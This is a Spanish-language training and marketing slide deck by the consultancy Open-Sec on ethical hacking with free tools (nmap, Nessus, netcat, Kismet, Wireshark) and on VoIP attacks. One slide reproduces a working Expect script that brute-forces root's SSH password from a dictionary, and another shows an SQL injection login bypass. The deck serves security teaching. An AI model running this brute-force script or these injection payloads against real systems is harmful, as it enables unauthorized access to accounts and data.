ethical hacking con software libre
TRANSCRIPT
![Page 1: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/1.jpg)
www.Open-Sec.com
ETHICAL HACKING
Walter Cuestas, CEHGerente [email protected]
Carlos RenzoGerente de [email protected]
Mauricio UrizarConsultor [email protected]
http://www.open-sec.com
![Page 2: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/2.jpg)
www.Open-Sec.com
Por qué Open-Sec ?
Unico partner de Digium en Perú y Ecuador y uno de los 6 partners en Latino América.
Consultores expertos en Comunicaciones Unificadas. Consultores expertos en Soluciones de Telefonía VoIP.
Consultores expertos en seguridad VoIP. Open-Sec entrega 1 AÑO DE SOPORTE DIRECTO DE
DIGIUM.
Unica empresa en Perú que cuenta con consultores certificados como Certified Ethical Hacker por EC Council, la certificación de más prestigio a nivel internacional en ethical hacking.
Nuestros consultores saben como atacar y defender. En el 2007, Open-Sec realizó el 80% de los procesos de Ethical Hacking en
Perú.
Unica empresa peruana afiliada a ISECOM, orgaización líder en Seguridad de la Información y Seguridad Informática a nivel mundial.
Unica empresa en Perú que aplica la metodología OSSTMM (Open Source SecureTesting Methodology).
Los resultados de las evaluaciones que realizamos pueden ser validados ante ISECOM.
Pioneros en consultorías respecto a la NTP 17799
Las instalaciones más grandes en Perú se basan en SuSE Linux (Poder Judicial, BBVA).
Open-Sec entrega soporte a estas instalaciones mediante consultores expertos y certificados.
Miembros del proyecto OpenSUSE
![Page 3: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/3.jpg)
www.Open-Sec.com
Quiénes somos ?
•Un Equipo de Consultores con experiencia en organizaciones corporativas, estatales y privadas en
∙ Ethical Hacking∙ Computación Forense∙ Aseguramiento∙ Voz sobre IP∙ Seguridad de la Información
![Page 4: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/4.jpg)
www.Open-Sec.com
Principales Clientes de Open-Sec
Seguridad Informática Seguridad de la Información
Linux y Open Source
Estudio CaballeroBustamante
![Page 5: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/5.jpg)
Qué dicen las estadísticas ?
Conocimientotécnicorequerido
Sofisticación de las herramientas de los atacantes
Manipulación dePaquetes / Spoofing
19901980
AdivinarPasswords
Programasautoreplicados
Password Cracking
Explotación devulnerabilidadesconocidas Deshabilitar
auditorías
Back Doors
Sweepers
Sniffers
Análisis “Ocultos”
Alto
Bajo 2000+
DDoS
Gusanos enInternet
O-day exploits
![Page 6: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/6.jpg)
www.Open-Sec.com
Seguridad de la Información
![Page 7: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/7.jpg)
www.Open-Sec.com
Seguridad es el No. 2.
Por qué está en el mundo de los negocios?
Es la seguridad SU negocio?
Sí no, qué esta protegiendo Ud.?
Puede contarlo ? Tiene un valor?
Por qué usan computadoras ?
Productividad, eficiencia, costos Riéndose con un amigo de las fotos corporativas que
encontró en su red wireless
Admin borrando logs después de bajar películas toda la
ncohe
Reenvia correos de su jefe a un reportero aún cuando ella no tiene derechos para
ello
Vende lapiceros y toner por Internet, los
“toma” del trabajo
Cambiando las fechas en los registros de
impuestos antes de una audotoría
![Page 8: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/8.jpg)
www.Open-Sec.com
Qué es seguridad ???
Proteger la información de un amplio espectro de amenazas, a efectos de asegurar la continuidad del negocio, minimizar los daños a la organización y maximizar el retorno de inversiones y las oportunidades del negocio.
Asegurar que los recursos del sistema de información (material informático o programas) de una organización sean utilizados de la manera que se decidió..
Seguridad de la Información
Seguridad Informática
![Page 9: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/9.jpg)
www.Open-Sec.com
ExploitsDa
orígen a
Conducea
PuedeDañar
YCausar
un
Que generala aplicación de medidas de
Afectadirectamente
ActivoExposure
Agente de Amenaza
Amenaza
Vulnerabilidad
Protección
Debilidades que puedenproveer de accesono autorizado a
los recursos
Cualquier daño potencial a los sistemas de información
Probabilidad que un Agente de
Amenaza explote una vulnerabilidad
Riesgo
Actúa en las Amenazas
Actúa en las Amenazas
Instancia en que es
expuesto a perdidas debido al Agente de Amenaza
Amenazas, vulnerabilidades & riesgos
![Page 10: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/10.jpg)
www.Open-Sec.com
Ethical Hacking ....
![Page 11: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/11.jpg)
www.Open-Sec.com
“Hackeando” ?
www.opensec.com
![Page 12: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/12.jpg)
www.Open-Sec.com
Nuestros “hackers”...
![Page 13: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/13.jpg)
www.Open-Sec.com
Los REALES...
![Page 14: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/14.jpg)
www.Open-Sec.com
Ellos las prefieren GORDAS...?
![Page 15: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/15.jpg)
www.Open-Sec.com
Wow! Tengo que aprender mucho!
![Page 16: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/16.jpg)
www.Open-Sec.com
No tanto...Uds ya son “viejos”....
![Page 17: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/17.jpg)
www.Open-Sec.com
Vulnerabilidades Frecuentes
Cliente
Remoto
0.Ausencia de SPPPG.1.Configuración no decuada de router.2.RAS no asegurado ni monitoreado.3.Fuga de información.4.Servicios innecesarios.5.Passwords débiles.6.Cuentas con demasiado privilegio.7.Servicios Internet mal configurados.8.Firewall mal configurado.9.Ausencia de parches o configuración default.10.Derechos excesivos sobre recursos.11.Excesivas relaciones de confianza.12.Servicios no autenticados/autorizados.13.Ausencia de IDPS(NIPDS,NNIPDS,HIDPS).
Router
Internet
RAS
Oficina
Remota
Firewall
Router
Interno
DMZIDPS
VLAN1
Red Interna
VLAN2
![Page 18: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/18.jpg)
www.Open-Sec.com
Estudios y Certificaciones, se requieren ?
![Page 19: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/19.jpg)
www.Open-Sec.com
EL HACKING
ES UN ARTE LA EVALUACIÓN
DESEGURIDAD
ES UNACIENCIA
![Page 20: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/20.jpg)
www.Open-Sec.com
No se requiere tan poco como esto...
![Page 21: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/21.jpg)
www.Open-Sec.com
Perotampocotantocomo esto....
![Page 22: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/22.jpg)
www.Open-Sec.com
Se requiere una metodología...
Obtención de Información y Footprinting
Trofeo
Evidencia
Borrado de
Rastros
Escalamiento de PrivilegiosObtención
de
Acceso
Análisis
de
Vulnerabilidades
Scanning
y
Enumeración
Footprint
![Page 23: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/23.jpg)
www.Open-Sec.com
Peromejoruna de VERDAD, ESTANDARIZADA,DOCUMENTADA,MANTENIDA,ACEPTADA, CERTIFICABLE
www.opensec.com
![Page 24: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/24.jpg)
www.Open-Sec.com
OSSTMM :Metodología
Cuantificable
![Page 25: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/25.jpg)
www.Open-Sec.com
A qué ayuda OSSTMM ? A pasar del caos (desorden sin resultado positivo) y la frustración ...
![Page 26: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/26.jpg)
www.Open-Sec.com
... a solamente esperar por los resultados...bueno, es un decir...
![Page 27: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/27.jpg)
www.Open-Sec.com
Análisis de Vulnerabilidad versus Pruebas de Penetración
Herramientas automatizadas versus “Análisis a pulso”
![Page 28: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/28.jpg)
www.Open-Sec.com
Ejemplo de Vulnerabilidad Confirmada
![Page 29: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/29.jpg)
www.Open-Sec.com
Revisión de la Inteligencia Competitiva
Sólo un ejemplo de OSSTMM, entonces, ...
![Page 30: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/30.jpg)
www.Open-Sec.com
Las Herramientas....
![Page 31: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/31.jpg)
www.Open-Sec.com
HerramientaNro 1
![Page 32: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/32.jpg)
www.Open-Sec.com
![Page 33: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/33.jpg)
www.Open-Sec.com
![Page 34: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/34.jpg)
www.Open-Sec.com
![Page 35: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/35.jpg)
www.Open-Sec.com
![Page 36: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/36.jpg)
www.Open-Sec.com
![Page 37: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/37.jpg)
www.Open-Sec.com
Muchas veces tendrán que compilar...
![Page 38: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/38.jpg)
www.Open-Sec.com
Casi siempre requerirán acceso tipo root...aunque algunas tienen su versión para MS Windows...nadie es perfecto :(
![Page 39: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/39.jpg)
www.Open-Sec.com
Herramienta Nro 2 : NMAP (Network MAPper)
![Page 40: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/40.jpg)
www.Open-Sec.com
NMAPFENMAP CLI
![Page 41: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/41.jpg)
www.Open-Sec.com
nmap -P0 -v -oA archivo_log direccion_ipnmap -sR -A -P0 -v -oN archivo_log direccion_ip
Las más usadas :
www.insecure.org
![Page 42: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/42.jpg)
www.Open-Sec.com
PASSIVE OS fingerprint scanning
Conexiones entrantes p0f
Conexiones salientesp0f -A -S -M-A SYN/ACK-S mostrar incluso firmas conocidas-M detectar NAT
192.165.38.73:20908 - OpenBSD 3.0-3.4 (up: 836 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:21154 - Linux 2.4/2.6 (NAT!) (up: 173 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:22003 - Windows XP Pro SP1, 2000 SP3 (NAT!) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)
>> Masquerade at 192.165.38.73: indicators at 69%.
![Page 43: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/43.jpg)
www.Open-Sec.com
Herramienta Nro 3
Con la versión 3, ir a http://www.openvas.org/doku.php
www.nessus.org
![Page 44: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/44.jpg)
www.Open-Sec.com
Instalación de Nessus :
• Servidor v3– Seleccionar “Nessus 3.0.6 for Linux”.– Registrarse para envió de código de activación– Descargar archivo según distribución linux
• Nessus-3.0.6-suse10.0.i586.rpm• Disponible para todos los sistemas Unix
– Instalar archivo descargado.
![Page 45: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/45.jpg)
www.Open-Sec.com
Ejecución del cliente :
#nessus &
![Page 46: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/46.jpg)
www.Open-Sec.com
NessConnect : El mejor cliente de Nessus...
![Page 47: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/47.jpg)
www.Open-Sec.com
VulnerabilidadesaniveldeAplicaciones
![Page 48: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/48.jpg)
www.Open-Sec.com
Herramienta Nro. 4 : wikto
http://www.sensepost.com/research/wikto/
![Page 49: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/49.jpg)
www.Open-Sec.com
Varios en uno solo : Spider, Fingerprint, Wikto, Googler
![Page 50: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/50.jpg)
www.Open-Sec.com
Herramienta Nro 5
NetCat
/\_/\ / 0 0 \ ====v==== \ W / | | _ / ___ \ / / / \ \ | ((()))' / ( ___ \__.=|___E /
http://netcat.sourceforge.net/
![Page 51: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/51.jpg)
www.Open-Sec.com
![Page 52: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/52.jpg)
www.Open-Sec.com
![Page 53: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/53.jpg)
www.Open-Sec.com
Herramientas Nro 6
Simples Scripts#!/usr/bin/expect -f## simple expect exploit to brute force root's password via ssh without# detection.. see CLABS200101 for info on this exploit.## this is beerware, just buy me a beer at defcon if you like this.# build your own dictionary, use at your own risk, no warranty, etc.## [email protected] january, 2001#
set timeout 3set target [lindex $argv 0]set dictionary [lindex $argv 1]
if {[llength $argv] != 2} { puts stderr "Usage: $argv0 root@target dictionary\n" exit }
set tryPass [open $dictionary r]
foreach passwd [split [read $tryPass] "\n"] { spawn ssh $target expect ":" send "$passwd\n" expect "#" { puts "password is $passwd\n" ; exit } set id [exp_pid] exec kill -INT $id}#www.hack.co.za
![Page 54: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/54.jpg)
www.Open-Sec.com
Herramienta Nro 7Wireless Hacking : Kismet
www.opensec.com
![Page 55: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/55.jpg)
www.Open-Sec.com
Herramienta Nro 8Secuestro de Sesiones y Más!
www.opensec.com
![Page 56: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/56.jpg)
www.Open-Sec.com
Herramienta Nro 9SQL Injection – La Moda
www.opensec.com
' or 1=1
sql = "SELECT * FROM users WHERE username = '" + username + "' AND userpass = '" + password + "'"
SELECT * FROM users WHERE username = '' or 1=1--' AND userpass =''
![Page 57: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/57.jpg)
www.Open-Sec.com
Herramienta Nro 10Apelando a la inocencia...
www.opensec.com
![Page 58: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/58.jpg)
www.Open-Sec.com
Hacking VoIP
Políticas y Procedimientos
Seguridad del Sistema Operativo
Seguridad Servicios Complementarios
(web, DHCP, bases de datos)
Seguridad de la Red (IO,TCP,UDP)
Seguridad Física
Buffer overflow, configuración débil,
DoS, gusanos
Fraude de llamadas, fuzzing,
INVITE/BYE/CANCEL floods, call hijacking,
call eavesdropping, modificación de llamadas
Passwords débiles en el correo
de voz, abuso de larga distancia
Servidor expuesto, DoS, Reboot
SYN flooding, ICMP unreacheable,
DDoS
SQL Injection, saturación de DHCP
Seguridad del protocol
VoIP y Aplicaciones
![Page 59: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/59.jpg)
www.Open-Sec.com
Asterisk
Scanning
The 65527 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
111/udp open|filtered rpcbind
631/udp open|filtered unknown
694/udp open|filtered unknown
2727/udp open|filtered unknown
4520/udp open|filtered unknown
4569/udp open|filtered unknown IAX
5060/udp open|filtered sip SIP
5353/udp open|filtered unknown
32768/udp open|filtered omad
![Page 60: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/60.jpg)
www.Open-Sec.com
Herramienta 11 : Wireshark !!!
+ VoMIT + waveplayer
![Page 61: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/61.jpg)
www.Open-Sec.com
Herramienta 12 : SiVuSRequestLine: REGISTER sip:10.1.101.99 SIP/2.0
Method: REGISTER
Resent Packet: False
Message Header
Via: SIP/2.0/UDP 10.1.101.99:5060;
branch=83c598e06fce4414afdd11a8acd30527
From: 4000 <sip:[email protected]>;
tag=83c5ac5c6fce441480cede7720487e25
To: 4000 <sip:[email protected]>
CallID: 83c5baaa6fce44148ff6f57c46985163
CSeq: 1 REGISTER
MaxForwards: 70
Contact: *
Expires: 0
ContentLength: 0
![Page 62: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/62.jpg)
www.Open-Sec.comwww.opensec.com
![Page 63: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/63.jpg)
www.Open-Sec.com
![Page 64: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/64.jpg)
www.Open-Sec.com
Sóloelcieloesellímite...
www.opensec.com
![Page 65: Ethical Hacking Con Software Libre](https://reader034.vdocuments.site/reader034/viewer/2022051312/5460ba85b1af9ff0588b54d3/html5/thumbnails/65.jpg)
www.Open-Sec.com
DEFCON
No hay victimas, SOLO VOLUNTARIOS